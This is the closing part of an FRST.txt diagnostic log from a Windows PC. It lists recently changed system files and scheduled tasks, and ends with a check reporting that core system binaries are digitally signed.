2016-01-12 20:53 - 2015-12-03 18:00 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:58 - 00378880 ____C (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll

2016-01-12 20:53 - 2015-12-03 17:51 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll

2016-01-12 20:53 - 2015-12-03 17:36 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll

2016-01-12 20:53 - 2015-12-03 17:30 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL

2016-01-12 20:53 - 2015-12-03 17:28 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

2016-01-12 20:53 - 2015-12-03 17:28 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax

2016-01-12 20:53 - 2015-12-03 17:27 - 00736256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:24 - 01411584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL

2016-01-12 20:53 - 2015-12-03 17:23 - 00402432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL

2016-01-12 20:53 - 2015-12-03 17:16 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll

2016-01-12 20:53 - 2015-12-03 17:13 - 01441280 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll

2016-01-12 20:53 - 2015-12-03 17:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll

2016-01-12 20:53 - 2015-12-03 17:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll

2016-01-12 20:53 - 2015-12-03 17:01 - 00743936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL

2016-01-12 20:53 - 2015-12-03 16:45 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll

2016-01-12 20:53 - 2015-12-03 16:40 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL

2016-01-12 20:53 - 2015-12-03 16:29 - 00887296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL

2016-01-12 20:53 - 2015-12-02 15:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll

2016-01-12 20:53 - 2015-12-02 15:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll

2016-01-12 20:52 - 2015-12-08 19:08 - 00685432 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll

2016-01-12 20:52 - 2015-12-08 19:07 - 00507176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-02-09 18:21 - 2015-12-08 09:24 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1343854479-873069186-2863876452-1002

2016-02-09 17:39 - 2015-12-14 13:39 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job

2016-02-09 17:38 - 2015-12-14 13:38 - 00000937 _____ C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job

2016-02-09 17:31 - 2015-10-07 13:32 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-02-09 17:25 - 2015-12-08 11:54 - 00003950 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{D813D5A7-8FB5-485D-B469-BE69E474CFFF}

2016-02-09 17:19 - 2015-12-14 14:01 - 00000000 __RDO C:\Users\Molly Poole\OneDrive

2016-02-09 17:18 - 2015-10-07 13:32 - 00000920 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-02-09 17:18 - 2013-08-22 14:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-02-09 17:01 - 2013-08-22 13:36 - 00000000 ____D C:\Windows\Inf

2016-02-09 16:57 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Packages

2016-02-09 15:49 - 2013-08-22 13:25 - 00524288 ___SH C:\Windows\system32\config\BBI

2016-02-09 10:04 - 2015-12-08 10:21 - 00000000 ____D C:\ProgramData\TEMP

2016-02-07 20:32 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\AppReadiness

2016-02-05 13:37 - 2015-12-08 10:47 - 00003108 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002

2016-02-05 13:33 - 2015-10-07 13:32 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-02-05 13:27 - 2015-12-08 11:20 - 00000000 ____D C:\ProgramData\Claro Software

2016-02-04 13:39 - 2015-10-07 11:34 - 00000000 ____D C:\ProgramData\Hewlett-Packard

2016-02-02 04:26 - 2015-10-07 13:32 - 00003896 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2016-02-02 04:26 - 2015-10-07 13:32 - 00003660 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2016-02-01 15:04 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Claro Software

2016-02-01 15:04 - 2015-12-08 11:20 - 00000000 ____D C:\Program Files (x86)\Claro Software

2016-02-01 15:03 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\regid.2004-06.com.clarosoftware

2016-02-01 13:14 - 2015-12-08 09:18 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Google

2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared

2016-01-28 20:45 - 2015-12-08 10:30 - 00000000 ____D C:\Program Files\Microsoft Office

2016-01-24 23:10 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole

2016-01-24 20:00 - 2013-08-22 15:36 - 00000000 ___HD C:\Program Files\WindowsApps

2016-01-22 21:29 - 2015-12-14 21:42 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Adobe

2016-01-22 18:10 - 2015-12-08 10:17 - 00000000 ____D C:\ProgramData\Nuance

2016-01-22 14:12 - 2015-12-08 10:24 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Apple Computer

2016-01-22 14:12 - 2014-11-22 01:00 - 00992588 _____ C:\Windows\system32\PerfStringBackup.INI

2016-01-19 13:41 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\rescache

2016-01-19 12:50 - 2015-12-08 10:30 - 00002457 _____ C:\Users\Public\Desktop\Sonocent Audio Notetaker.lnk

2016-01-19 12:00 - 2015-12-08 11:55 - 00001235 _____ C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT

2016-01-18 22:07 - 2015-10-07 13:33 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2016-01-18 22:06 - 2015-10-07 13:33 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files\Microsoft Silverlight

2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight

2016-01-13 21:40 - 2015-10-07 13:08 - 00000000 ____D C:\Windows\system32\appraiser

2016-01-13 21:40 - 2014-11-22 05:15 - 00000000 ___SD C:\Windows\system32\CompatTel

2016-01-13 18:21 - 2013-08-22 15:20 - 00000000 ____D C:\Windows\CbsTemp

2016-01-13 18:20 - 2015-10-07 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight

2016-01-13 18:17 - 2015-10-07 13:00 - 00000000 ____D C:\Windows\system32\MRT

2016-01-13 18:14 - 2015-10-07 13:00 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

 

==================== Files in the root of some directories =======

 

2015-12-08 11:55 - 2016-01-19 12:00 - 0001235 _____ () C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT

 

Some files in TEMP:

====================

C:\Users\Molly Poole\AppData\Local\Temp\sqlite3.dll

 

 

==================== Bamital & volsnap =================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2016-02-05 17:12

 

==================== End of FRST.txt ============================